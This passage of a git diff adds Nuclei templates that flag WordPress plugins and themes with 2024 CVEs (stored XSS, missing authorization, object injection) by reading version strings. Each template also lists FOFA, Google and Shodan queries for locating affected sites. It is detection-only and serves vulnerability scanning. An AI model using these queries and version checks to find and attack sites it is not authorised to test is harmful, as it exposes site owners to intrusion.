+    The Gutentor – Gutenberg Blocks – Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/17ecebfd-b07f-415f-892f-e069ab84031a?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-10178
+  metadata:
+    fofa-query: "wp-content/plugins/gutentor/"
+    google-query: inurl:"/wp-content/plugins/gutentor/"
+    shodan-query: 'vuln:CVE-2024-10178'
+  tags: cve,wordpress,wp-plugin,gutentor,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "gutentor"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.3.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10262-095b139b709489482e9b7f3886286811.yaml b/poc/cve/CVE-2024-10262-095b139b709489482e9b7f3886286811.yaml
new file mode 100644
index 0000000000..ee169e1c54
--- /dev/null
+++ b/poc/cve/CVE-2024-10262-095b139b709489482e9b7f3886286811.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10262-095b139b709489482e9b7f3886286811
+
+info:
+  name: >
+    Drop Shadow Boxes <= 1.7.14 - Authenticated (Subscriber+) Arbitrary Shortcode Execution
+  author: topscoder
+  severity: low
+  description: >
+    The The Drop Shadow Boxes plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.7.14. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa0a296a-a93f-4c0e-9911-b4f9bdd53fad?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 6.3
+    cve-id: CVE-2024-10262
+  metadata:
+    fofa-query: "wp-content/plugins/drop-shadow-boxes/"
+    google-query: inurl:"/wp-content/plugins/drop-shadow-boxes/"
+    shodan-query: 'vuln:CVE-2024-10262'
+  tags: cve,wordpress,wp-plugin,drop-shadow-boxes,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/drop-shadow-boxes/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "drop-shadow-boxes"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.7.14')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10567.yaml b/poc/cve/CVE-2024-10567.yaml
new file mode 100644
index 0000000000..8592183f82
--- /dev/null
+++ b/poc/cve/CVE-2024-10567.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10567
+
+info:
+  name: >
+    TI WooCommerce Wishlist <= 2.9.1 - Missing Authorization to Unauthenticated Plugin Setup Wizard Access
+  author: topscoder
+  severity: high
+  description: >
+    The TI WooCommerce Wishlist plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wizard' function in all versions up to, and including, 2.9.1. This makes it possible for unauthenticated attackers to create new pages, modify plugin settings, and perform limited options updates.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0a5f2e1a-2216-4885-9b74-a08142816f2b?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-10567
+  metadata:
+    fofa-query: "wp-content/plugins/ti-woocommerce-wishlist/"
+    google-query: inurl:"/wp-content/plugins/ti-woocommerce-wishlist/"
+    shodan-query: 'vuln:CVE-2024-10567'
+  tags: cve,wordpress,wp-plugin,ti-woocommerce-wishlist,high
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/ti-woocommerce-wishlist/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "ti-woocommerce-wishlist"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.9.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10587.yaml b/poc/cve/CVE-2024-10587.yaml
new file mode 100644
index 0000000000..f505a330df
--- /dev/null
+++ b/poc/cve/CVE-2024-10587.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10587
+
+info:
+  name: >
+    Funnelforms Free <= 3.7.4.1 - Authenticated (Contributor+) PHP Object Injection
+  author: topscoder
+  severity: low
+  description: >
+    The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.7.4.1 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/701e6afe-08fa-49c7-a6da-cb266db07c48?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2024-10587
+  metadata:
+    fofa-query: "wp-content/plugins/funnelforms-free/"
+    google-query: inurl:"/wp-content/plugins/funnelforms-free/"
+    shodan-query: 'vuln:CVE-2024-10587'
+  tags: cve,wordpress,wp-plugin,funnelforms-free,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "funnelforms-free"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.7.4.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10663.yaml b/poc/cve/CVE-2024-10663.yaml
new file mode 100644
index 0000000000..cbe749eb6f
--- /dev/null
+++ b/poc/cve/CVE-2024-10663.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10663
+
+info:
+  name: >
+    Eleblog – Elementor Blog And Magazine Addons <= 1.8 - Missing Authorization to Authenticated (Subscriber+) Deactivation Submission
+  author: topscoder
+  severity: low
+  description: >
+    The Eleblog – Elementor Blog And Magazine Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the goodbye_form_callback() function in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit a deactivation reason.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f355d2c0-6133-4091-b900-1451ebba70c4?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2024-10663
+  metadata:
+    fofa-query: "wp-content/plugins/ele-blog/"
+    google-query: inurl:"/wp-content/plugins/ele-blog/"
+    shodan-query: 'vuln:CVE-2024-10663'
+  tags: cve,wordpress,wp-plugin,ele-blog,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/ele-blog/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "ele-blog"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10664.yaml b/poc/cve/CVE-2024-10664.yaml
new file mode 100644
index 0000000000..327bff7f3b
--- /dev/null
+++ b/poc/cve/CVE-2024-10664.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10664
+
+info:
+  name: >
+    Knowledge Base documentation & wiki plugin – BasePress Docs <= 2.16.3.3 - Missing Authorization to Authenticated (Subscriber+) Database Update
+  author: topscoder
+  severity: low
+  description: >
+    The Knowledge Base documentation & wiki plugin – BasePress Docs plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the basepress_db_posts_update() function in all versions up to, and including, 2.16.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the database.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/3aa6f3c2-0e45-4243-a26d-ba1c702fbe11?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2024-10664
+  metadata:
+    fofa-query: "wp-content/plugins/basepress/"
+    google-query: inurl:"/wp-content/plugins/basepress/"
+    shodan-query: 'vuln:CVE-2024-10664'
+  tags: cve,wordpress,wp-plugin,basepress,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/basepress/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "basepress"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.16.3.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10777-3d0f2c41b4182831f7340ab1eb913016.yaml b/poc/cve/CVE-2024-10777-3d0f2c41b4182831f7340ab1eb913016.yaml
new file mode 100644
index 0000000000..14f601665f
--- /dev/null
+++ b/poc/cve/CVE-2024-10777-3d0f2c41b4182831f7340ab1eb913016.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10777-3d0f2c41b4182831f7340ab1eb913016
+
+info:
+  name: >
+    AnyWhere Elementor <= 1.2.11 - Authenticated (Contributor+) Post Disclosure
+  author: topscoder
+  severity: low
+  description: >
+    The AnyWhere Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.11 via the 'INSERT_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2138634-c149-4fd1-a33d-351bbf633ea3?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2024-10777
+  metadata:
+    fofa-query: "wp-content/plugins/anywhere-elementor/"
+    google-query: inurl:"/wp-content/plugins/anywhere-elementor/"
+    shodan-query: 'vuln:CVE-2024-10777'
+  tags: cve,wordpress,wp-plugin,anywhere-elementor,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/anywhere-elementor/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "anywhere-elementor"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.2.11')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10787.yaml b/poc/cve/CVE-2024-10787.yaml
new file mode 100644
index 0000000000..c629cacd53
--- /dev/null
+++ b/poc/cve/CVE-2024-10787.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10787
+
+info:
+  name: >
+    LA-Studio Element Kit for Elementor <= 1.4.4 - Authenticated (Contributor+) Post Disclosure
+  author: topscoder
+  severity: low
+  description: >
+    The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.4 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created by Elementor that they should not have access to.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e63c0fb-7fe7-42f7-8fa9-ec159d3c8117?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2024-10787
+  metadata:
+    fofa-query: "wp-content/plugins/lastudio-element-kit/"
+    google-query: inurl:"/wp-content/plugins/lastudio-element-kit/"
+    shodan-query: 'vuln:CVE-2024-10787'
+  tags: cve,wordpress,wp-plugin,lastudio-element-kit,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/lastudio-element-kit/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "lastudio-element-kit"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.4.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10832.yaml b/poc/cve/CVE-2024-10832.yaml
new file mode 100644
index 0000000000..7422ccd2b6
--- /dev/null
+++ b/poc/cve/CVE-2024-10832.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10832
+
+info:
+  name: >
+    Posti Shipping <= 3.10.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via generate_notices_html Function
+  author: topscoder
+  severity: medium
+  description: >
+    The Posti Shipping plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.10.3. This is due to missing or incorrect nonce validation on the generate_notices_html() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/079c77f1-3aab-4457-ad66-a2a2d9a55b2e?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2024-10832
+  metadata:
+    fofa-query: "wp-content/plugins/posti-shipping/"
+    google-query: inurl:"/wp-content/plugins/posti-shipping/"
+    shodan-query: 'vuln:CVE-2024-10832'
+  tags: cve,wordpress,wp-plugin,posti-shipping,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/posti-shipping/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "posti-shipping"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.10.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10848-7435d35ca01d98267edea517a3f5f67d.yaml b/poc/cve/CVE-2024-10848-7435d35ca01d98267edea517a3f5f67d.yaml
new file mode 100644
index 0000000000..a57b1081f7
--- /dev/null
+++ b/poc/cve/CVE-2024-10848-7435d35ca01d98267edea517a3f5f67d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10848-7435d35ca01d98267edea517a3f5f67d
+
+info:
+  name: >
+    NewsMunch <= 1.0.35 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The NewsMunch theme for WordPress is vulnerable to Stored Cross-Site Scripting via a malicious display name in all versions up to, and including, 1.0.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a2b0ff4-9471-4fd0-ac1a-ed5b7b4af4ff?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-10848
+  metadata:
+    fofa-query: "wp-content/themes/newsmunch/"
+    google-query: inurl:"/wp-content/themes/newsmunch/"
+    shodan-query: 'vuln:CVE-2024-10848'
+  tags: cve,wordpress,wp-theme,newsmunch,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/themes/newsmunch/style.css"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Version: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Version: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "newsmunch"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.0.35')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10881-596695d2d6cc01668d710d28f9523f24.yaml b/poc/cve/CVE-2024-10881-596695d2d6cc01668d710d28f9523f24.yaml
new file mode 100644
index 0000000000..8c548e31a4
--- /dev/null
+++ b/poc/cve/CVE-2024-10881-596695d2d6cc01668d710d28f9523f24.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10881-596695d2d6cc01668d710d28f9523f24
+
+info:
+  name: >
+    LUNA RADIO PLAYER <= 6.24.11.07 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+  author: topscoder
+  severity: low
+  description: >
+    The LUNA RADIO PLAYER plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lunaradio' shortcode in versions up to, and including, 6.24.11.07 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ed8a7f8-1af3-4b41-bfaf-fd1c35baa867?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-10881
+  metadata:
+    fofa-query: "wp-content/plugins/lu-radioplayer/"
+    google-query: inurl:"/wp-content/plugins/lu-radioplayer/"
+    shodan-query: 'vuln:CVE-2024-10881'
+  tags: cve,wordpress,wp-plugin,lu-radioplayer,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/lu-radioplayer/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "lu-radioplayer"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 6.24.11.07')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10885.yaml b/poc/cve/CVE-2024-10885.yaml
new file mode 100644
index 0000000000..1a42c81188
--- /dev/null
+++ b/poc/cve/CVE-2024-10885.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10885
+
+info:
+  name: >
+    SearchIQ – The Search Solution <= 4.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The SearchIQ – The Search Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'siq_searchbox' shortcode in all versions up to, and including, 4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/86e8e16f-9d93-457a-9093-2fd236e51682?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-10885
+  metadata:
+    fofa-query: "wp-content/plugins/searchiq/"
+    google-query: inurl:"/wp-content/plugins/searchiq/"
+    shodan-query: 'vuln:CVE-2024-10885'
+  tags: cve,wordpress,wp-plugin,searchiq,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/searchiq/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "searchiq"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 4.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10937-e65765a33d97e7492f011b63b4951ffc.yaml b/poc/cve/CVE-2024-10937-e65765a33d97e7492f011b63b4951ffc.yaml
new file mode 100644
index 0000000000..d02869d667
--- /dev/null
+++ b/poc/cve/CVE-2024-10937-e65765a33d97e7492f011b63b4951ffc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10937-e65765a33d97e7492f011b63b4951ffc
+
+info:
+  name: >
+    Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins <= 2.0.58 - Sensitive Information Exposure
+  author: topscoder
+  severity: medium
+  description: >
+    The Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.58 via the wp_ajax_nopriv_related_post_ajax_get_post_ids AJAX action. This makes it possible for unauthenticated attackers to extract sensitive data including titles of posts in draft status.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/85f7c69d-0b48-47af-9451-3cfd4326ffe5?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2024-10937
+  metadata:
+    fofa-query: "wp-content/plugins/related-post/"
+    google-query: inurl:"/wp-content/plugins/related-post/"
+    shodan-query: 'vuln:CVE-2024-10937'
+  tags: cve,wordpress,wp-plugin,related-post,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/related-post/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "related-post"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.0.58')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10952.yaml b/poc/cve/CVE-2024-10952.yaml
new file mode 100644
index 0000000000..0c0960a650
--- /dev/null
+++ b/poc/cve/CVE-2024-10952.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10952
+
+info:
+  name: >
+    Authors List <= 2.0.4 - Unauthenticated Arbitrary Shortcode Execution via update_authors_list_ajax
+  author: topscoder
+  severity: high
+  description: >
+    The The Authors List plugin for WordPress is vulnerable to arbitrary shortcode execution via update_authors_list_ajax AJAX action in all versions up to, and including, 2.0.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/8b3cfe0a-dcfb-40f3-ba43-4e838c113010?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 7.3
+    cve-id: CVE-2024-10952
+  metadata:
+    fofa-query: "wp-content/plugins/authors-list/"
+    google-query: inurl:"/wp-content/plugins/authors-list/"
+    shodan-query: 'vuln:CVE-2024-10952'
+  tags: cve,wordpress,wp-plugin,authors-list,high
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/authors-list/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "authors-list"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.0.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11093.yaml b/poc/cve/CVE-2024-11093.yaml
new file mode 100644
index 0000000000..a784ea36a2
--- /dev/null
+++ b/poc/cve/CVE-2024-11093.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11093
+
+info:
+  name: >
+    SG Helper <= 1.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via SVG File Upload
+  author: topscoder
+  severity: low
+  description: >
+    The SG Helper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in version 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9016822f-f167-4225-8216-e74cd687443c?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 5.5
+    cve-id: CVE-2024-11093
+  metadata:
+    fofa-query: "wp-content/plugins/sg-helper/"
+    google-query: inurl:"/wp-content/plugins/sg-helper/"
+    shodan-query: 'vuln:CVE-2024-11093'
+  tags: cve,wordpress,wp-plugin,sg-helper,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/sg-helper/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
